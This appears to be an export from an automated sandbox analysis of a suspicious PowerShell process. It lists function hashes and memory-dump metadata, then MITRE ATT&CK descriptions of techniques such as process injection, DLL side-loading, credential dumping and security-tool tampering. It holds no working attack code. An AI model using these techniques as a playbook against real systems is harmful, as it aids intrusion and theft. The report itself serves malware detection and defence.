Opcode ID: 2c3a0e61714bd3a9549be9780fabf882f5d0564976165b78c004ecc538c1cc9a
Instruction ID: e10d8e2f5655f9699053c08c07cede1062af48403020c1fe65acbcdf2af7597a
Opcode Fuzzy Hash: 2c3a0e61714bd3a9549be9780fabf882f5d0564976165b78c004ecc538c1cc9a
Instruction Fuzzy Hash: 44E0D8357057145BCB092776E81C2BE7A57DBC4729F08002AEF0583340CF36290543E9

Function 04159170 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37b9ea7352cb60b2cee9d1d93f1c1be90a5af186b0cfd84591f94b7d2b57cbe4
Instruction ID: 8644e5d0ede8d0d38b2a4ed4ad8ff2aa0a8a3fd6567d9e4678c7863ccada6c11
Opcode Fuzzy Hash: 37b9ea7352cb60b2cee9d1d93f1c1be90a5af186b0cfd84591f94b7d2b57cbe4
Instruction Fuzzy Hash: AFF06DB09013048FD7609F79D4DC3ABBBE6EB44320F004469DA5ED3240DB396981CB90

Function 0415DE38 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de0fe0bf8901cdc0557104c70439f98be6a9e8e955f6f26a892ba6fa1909d23a
Instruction ID: 168ba38ee5155e7f295e66d3ec6b2d55c9093979acbe8b490c923ac3d6ff5793
Opcode Fuzzy Hash: de0fe0bf8901cdc0557104c70439f98be6a9e8e955f6f26a892ba6fa1909d23a
Instruction Fuzzy Hash: 22E086357415108B4616561D75144EF6B97DFC4661311846AE839C7310DF60ED0547D1

Function 0415DE81 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc15f5a1e92acc7efe3da60bdecb929ecae3a3777f376b353cf7af5e2d1c2329
Instruction ID: 6af622e95c73ac6cb9f93114f00e1ccace263d637d4de335d7da08ccdccde4c8
Opcode Fuzzy Hash: bc15f5a1e92acc7efe3da60bdecb929ecae3a3777f376b353cf7af5e2d1c2329
Instruction Fuzzy Hash: 31E0DF32B04000DB8B0C9698F4814E8F762DBC8210F15C03BDC2AA3350EB7228068791

Function 0415954A Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b97bda6b2e6ce48672ea33dc1dd4ea6473b15032266a59cfbbe9ddd25049a6
Instruction ID: d4bf072db0b43d49b5f124ea4fe5d5b1f2abcc28ec3662627f77258829a86511
Opcode Fuzzy Hash: 60b97bda6b2e6ce48672ea33dc1dd4ea6473b15032266a59cfbbe9ddd25049a6
Instruction Fuzzy Hash: 6AD05BD2731121DB555831AD14C06FF46DB8AC519871601B79D37C7271EF00FC271392

Function 0415DE89 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ea9941f5c83d967bf5aa84d44e85f1ef768c6d9c4c14630c449c21009a7b2c
Instruction ID: 11f961b278e39bfa6e14e3feaafbe9f63946459ef8260c0fdee9f87fdcdffaa3
Opcode Fuzzy Hash: 94ea9941f5c83d967bf5aa84d44e85f1ef768c6d9c4c14630c449c21009a7b2c
Instruction Fuzzy Hash: BEE04F31B04014DB8B089699E4504E9B766DBC8211F15C47BDD2AA7350EB7269168791

Function 04158978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02458223f67928789b58fb8933339dbeb606f00f6e2507c88121b595b3e5d2a5
Instruction ID: db585d4b9258bfe7005a0192c4e0f23282520f1c487c4fd2df340b5ccc900cf0
Opcode Fuzzy Hash: 02458223f67928789b58fb8933339dbeb606f00f6e2507c88121b595b3e5d2a5
Instruction Fuzzy Hash: 3AE048357057145BCB092776945C2BE7A57DBD4725F04002ADF1583340CF65690547D9

Function 04159558 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2cd99501759e128894141fed425279b7d439c4f427df837f95e5c4566a24319
Instruction ID: 9674a1d6654c247fd5b1b5951f23c912990f98871aa943d030bee588c7b027e7
Opcode Fuzzy Hash: c2cd99501759e128894141fed425279b7d439c4f427df837f95e5c4566a24319
Instruction Fuzzy Hash: 57D05ED27212259B565431AE18806FFA6DF8AC64E871900BA9E26C7261EE40FC2603E2

Function 0415DE40 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 356f229674a4bc6cc4b3cf1cf5a9488e2dfc91e90b8d94533d3e4de41ccee41e
Instruction ID: 9c65d98a271439bb63b3a80579bf9ca39d130b822bc0864554d81db198672a8a
Opcode Fuzzy Hash: 356f229674a4bc6cc4b3cf1cf5a9488e2dfc91e90b8d94533d3e4de41ccee41e
Instruction Fuzzy Hash: 40E0C2317406144B8722A62EB91489FBBEBDFC4AB1341846EE53DC7310DF60ED058BD5

Function 0415DE90 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 238b4d24a2749c84d395a67e64737f9a201e8b6b4e7c55437bf23734cb3508d7
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 22E08631B00014978B089599E4504D9F7A6DFCC220F04C47BDD1AA7350DB7269168791

Function 0415F600 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79d125f169ce7e06c5879951c99e6a35f068cc06003c05849744486cdd471e78
Instruction ID: a5714cbdf8e8ea04e08b7798572b1008fd31c158e34c5b7140506b50baa2ceaa
Opcode Fuzzy Hash: 79d125f169ce7e06c5879951c99e6a35f068cc06003c05849744486cdd471e78
Instruction Fuzzy Hash: DDE04F70D04249AFC780DFBCA8415AAFFF4EB49200F1085EED948D7321EA319A02CBD2

Function 0415AF90 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 043313e8e425dc43e011afa42bac91dc37a73b7a16c9d31ef8de342628c7e8d5
Instruction ID: b19083b6806f7b4797f19cae1821fa1ccf2ef18dd1211a12064a6f1896aa3774
Opcode Fuzzy Hash: 043313e8e425dc43e011afa42bac91dc37a73b7a16c9d31ef8de342628c7e8d5
Instruction Fuzzy Hash: D9D0A92238C021CB0B1CA01F74A00FF02878BD83A021A823BB829C3320EEA29C0302A0

Function 04158808 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0621ced574f3e96557ef5cdbd1d415852c7cc7df23bbd6d63766428a26212c
Instruction ID: 499b7c336aaaea9c5d345c1064ddf33a3851313c3d99008a57e1b38c32d2e092
Opcode Fuzzy Hash: 8d0621ced574f3e96557ef5cdbd1d415852c7cc7df23bbd6d63766428a26212c
Instruction Fuzzy Hash: FDE08634A043099F8704DF64E48646B7FB9A744300F004055AE06A3340EA306D51CBC1

Function 0415873C Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d79bc984a1632669483d36e6f28588a138a783bd8d841ad9ab458981b71cc148
Instruction ID: d09e80ab113b18ef55d7be383eacad30f7b6482cb1129c3406ff0873e5338995
Opcode Fuzzy Hash: d79bc984a1632669483d36e6f28588a138a783bd8d841ad9ab458981b71cc148
Instruction Fuzzy Hash: AEE0EC30915109CF8F08BFA5E45A4FD7F31EB14301B040169DF17A25A0EB31275ACA80

Function 04158739 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ef22df927b2e9334f1002605a41e375158d220c65e33abf2cd287748159291
Instruction ID: 0057417ef14d6bcf7ec9c54edf73e66d698a7926f47172013e69eda8d9e03e49
Opcode Fuzzy Hash: 59ef22df927b2e9334f1002605a41e375158d220c65e33abf2cd287748159291
Instruction Fuzzy Hash: D1E0EC31A29109CFCF0CBF66E45A4FD7F31EB14301B010159DF17A25A0AB312766CA80

Function 04158745 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eac37ca0d4db1044f01708314a3e893187370dcdd4880b8d86115d4e1de26c7f
Instruction ID: c988134c22d7c87a710d678390fb570495fa4e8ac92c76aacc31a60c836053b1
Opcode Fuzzy Hash: eac37ca0d4db1044f01708314a3e893187370dcdd4880b8d86115d4e1de26c7f
Instruction Fuzzy Hash: B8D0EC34815209DF8B08AF65E85A4EE7B74EB00301B400159EF0663590AA302B5ACAD1

Function 04158800 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f54f2b88c9380d155134b5b79583017ad313f02117862223b8a9afe7e998f0e8
Instruction ID: fb064422899a300536f8be35afc8a5902847b7afaa8f32705fef8d0306eddc1f
Opcode Fuzzy Hash: f54f2b88c9380d155134b5b79583017ad313f02117862223b8a9afe7e998f0e8
Instruction Fuzzy Hash: 30E0EC34A19206CF8B18EFA4D4864B97FB1E745200B00416AEE1693350FB312911EB81

Function 0415F610 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 728d5d39be27bb792dc34bdc30f0defdbff7a8e7d227339dd24747bab0690d77
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: FCD062B0D042099F8784DFADC94156DFBF4EB4C214F5085AE8919D7311F7315A128BD1

Function 04158748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59a071c69dd51fe1f65d4a7bf101bebd15460b2c8f117638fec47fed041c7a40
Instruction ID: 3fb6683693f447dcb41de88512638f9b22c98d7588bd05acddf287eeb7de23be
Opcode Fuzzy Hash: 59a071c69dd51fe1f65d4a7bf101bebd15460b2c8f117638fec47fed041c7a40
Instruction Fuzzy Hash: DBD0E230815209CB8B08AFA6E85A4EDBB34EB00201B400169DF06A3590AA302A5ACAD0

Function 04158810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f7aa73668ce4e74d246093a94baaccea6c78e6cec22443c758cd4988b9b370
Instruction ID: bd0ac6cadf7f878489f1c828cb7b7bc718c75d8a5f36135ab02f12a16a8ebeb5
Opcode Fuzzy Hash: f6f7aa73668ce4e74d246093a94baaccea6c78e6cec22443c758cd4988b9b370
Instruction Fuzzy Hash: 3ED01734A0830A8F8B08EFA5E44686EBFB5EB84300F00416AEE49A3350EA306911CBC1

Function 0415EBF7 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bddfe657335d78ee3edc077f574b8617b57d9b2af2f4b2faacf01f0ef79c40b
Instruction ID: d9b95659975ef872d340793c767ede98b5db211f0dc4486d5a2ea1dc0c6ded95
Opcode Fuzzy Hash: 1bddfe657335d78ee3edc077f574b8617b57d9b2af2f4b2faacf01f0ef79c40b
Instruction Fuzzy Hash: C1D09239B01218CFCB18CB94E894ADCB372FF84316F118065EA159B251CB32E912CB40

Function 04157932 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939e8b4f7d80c26db01f10ebcfd1296c8e97303777a17ce2e7c3bdfaa912bada
Instruction ID: 360d9c14f61aa7c904a9b878e290b08856cd570217d1be3ddec8d85ae63d96ef
Opcode Fuzzy Hash: 939e8b4f7d80c26db01f10ebcfd1296c8e97303777a17ce2e7c3bdfaa912bada
Instruction Fuzzy Hash: 23C08C30004309CFC3092F70D045824B328BF002153601499EC1F06292AF36A885CF40

Function 0415793F Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8785c460f86e564f971e435a5f31aa86f3b65b95026fde55bc1e5b8ab7314c9
Instruction ID: bc344a98a4a650cf48db3f256777912d3859cbe4768631bb7d3dc8cdd75f7ad9
Opcode Fuzzy Hash: e8785c460f86e564f971e435a5f31aa86f3b65b95026fde55bc1e5b8ab7314c9
Instruction Fuzzy Hash: 1CB0923504430D8FC3596F75E40A864772DBF4061938008A9E90E0AB928E3AE889CA96

Function 04157EA0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e982eb502b6405447a53b2b694edbc005601e788a1484f2b3ed11a29987cbaa8
Instruction ID: eaed3b12fcd36adc7b1ad07718e5b2dc1520bb62f8db6c379d42e5f55a009672
Opcode Fuzzy Hash: e982eb502b6405447a53b2b694edbc005601e788a1484f2b3ed11a29987cbaa8
Instruction Fuzzy Hash: 7DB01232B08202C7AF0CDB31448F176F733E78A20132390994413C1080CF3095019900

Function 04157940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d236818148682cdb21243998553048acd3605b2382a49cbadd1cfd81771360ab
Instruction ID: 2df045504d1ef07e1743183553f8f0a2bdde5a0f9dd38d34bddd666aa08ff554
Opcode Fuzzy Hash: d236818148682cdb21243998553048acd3605b2382a49cbadd1cfd81771360ab
Instruction Fuzzy Hash: D9B0923104430D8FC3496F75E409824732DBF4061938008A8E90E0A3928E3AE889CA45

Function 04157EAF Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fcbc8a73bcf0827836261e29cfb6d233602bafb51f5f9ec31f1a82124eebcd8
Instruction ID: b6dc94be83c1fc8d7055014ccbf88c157a034d0107ae17c5b847c9b645ff2725
Opcode Fuzzy Hash: 5fcbc8a73bcf0827836261e29cfb6d233602bafb51f5f9ec31f1a82124eebcd8
Instruction Fuzzy Hash: 7FA0027EE5811157BF4CDA3545595AA27735BC3242314C4AE9103C0484CD3495419544

Non-executed Functions

Function 06FE5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FE57C6
$^q, xrefs: 06FE5800
$^q, xrefs: 06FE57AA
$^q, xrefs: 06FE57F4

Memory Dump Source

Source File: 00000009.00000002.1769115574.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 6becffec295ddddbae780e67c6030b4a33ccf88584d5165748acb5a25ca4aff0
Instruction ID: 27a5564a007e5e12eea120074827afe5a4447493e3f68cb29dda1eeeba19173f
Opcode Fuzzy Hash: 6becffec295ddddbae780e67c6030b4a33ccf88584d5165748acb5a25ca4aff0
Instruction Fuzzy Hash: CA216B32F143099BEBA4596A8800B27BFDB6BC0719F24843AA905CF385DD77D845C361

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
